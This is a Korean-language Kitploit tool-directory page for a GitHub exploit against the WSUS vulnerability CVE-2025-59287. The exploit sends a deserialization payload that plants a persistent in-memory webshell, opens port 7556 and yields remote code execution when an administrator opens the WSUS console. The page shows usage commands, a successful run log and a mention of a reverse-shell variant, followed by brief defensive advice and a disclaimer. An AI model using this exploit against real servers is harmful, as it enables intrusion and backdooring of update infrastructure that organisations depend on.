Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-59287 — CVE-2025-59287용 익스플로잇으로, 관리자 콘솔이 열릴 때 WSUS 서버에 WolfShell 메모리 웹셸을 주입하여 원격 코드 실행을 달성합니다. | Kitploit
도구/GitHubGitHub/0x7556/cve-2025-59287
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHub0x7556/cve-2025-59287

CVE-2025-59287

CVE-2025-59287용 익스플로잇으로, 관리자 콘솔이 열릴 때 WSUS 서버에 WolfShell 메모리 웹셸을 주입하여 원격 코드 실행을 달성합니다.

저장소 보기
7310개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-59287 WSUS 취약점 재현

CVE-2025-59287 — WolfShell 울버린(Wolverine) 정방향 메모리 셸 주입

개요

CVE-2025-59287은 WSUS 관련 구성 요소의 논리적 결함을 이용하여 WolfShell 메모리 셸을 대상 서버에 주입합니다. 관리자가 WSUS 콘솔을 열 때(기본적으로 1~30분 내 무작위 시간에 트리거), 메모리 셸이 트리거되어 원격 코드 실행(RCE)이 발생합니다. 본 문서에는 악용 예시, 필요 파일 및 방어 권장 사항이 포함되어 있습니다.

사용 예시

사용법

대상 서버에 ysoserial.net 역직렬화 페이로드를 전송합니다. 기능은 사용자 정의가 가능하며, 본 프로젝트는 울버린 메모리 셸 주입을 시연합니다.

root@kitploit:~
Usage: CVE-2025-59287 <target_url> <payload_file>

울버린 WebShell ASPX 셸 주입 예시

root@kitploit:~
CVE-2025-59287 http://192.168.50.159:8530 wolfaspx.txt

메모리에 울버린 WolfShell 정방향 셸 주입 예시

root@kitploit:~
C:\Users\Administrator\Desktop\>CVE-2025-59287 http://192.168.50.159:8530 wolfshell.txt
[+] Target: http://192.168.50.159:8530/
[+] Payload read successfully, length: 20413 characters

[+] Getting Server ID...
[+] Server ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Auth cookie with Server ID...
[+] Using ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Sending event with payload...
[+] SUCCESS!
[!] RCE will trigger when you open the WSUS console!
[!] to cleanup remove the hawktrace.local computer from WSUS

방화벽에서 7556 포트 허용 예시

root@kitploit:~
CVE-2025-59287 http://192.168.50.159:8530 allow7556.txt

exp

PowerShell 리버스 셸

win2019 Defender가 차단 및 탐지하여 사용 불가 Defende

WSUS 콘솔을 열어 취약점 트리거

그림과 같이 7556 포트를 성공적으로 리슨하면 울버린 메모리 정방향 셸이 주입되었음을 의미합니다. WolfDoor 1

울버린 연결 메모리 셸에서 CMD 명령 실행

WolfDoor 2

방어 권장 사항

  • 영향을 받는 WSUS 서버에 공급업체가 제공한 패치 또는 임시 완화 조치를 즉시 적용하십시오.
  • WSUS에서 의심스러운 클라이언트(예: hawktrace.local)를 확인하고 제거하십시오.
  • WSUS 관리 콘솔에 대한 접근을 제한하고 감사하여 신뢰할 수 있는 관리자만 접근할 수 있도록 하십시오.
  • 침입 탐지, 메모리 스캔 및 호스트 무결성 모니터링 도구를 사용하여 비정상적인 메모리 셸 또는 의심스러운 모듈을 탐지하십시오.
  • 패치가 적용되기 전까지 신뢰할 수 없는 환경에서 WSUS 콘솔을 열거나 의심스러운 업데이트 항목을 처리하지 마십시오.

면책 조항

본 문서는 보안 연구 및 방어 목적으로만 제공됩니다. 관련 악용 코드를 승인되지 않은 시스템이나 공격 활동에 사용하지 마십시오.

참고 링크

https://github.com/0x7556/wolfshell https://github.com/0x7556/CVE-2025-59287

도구 다운로드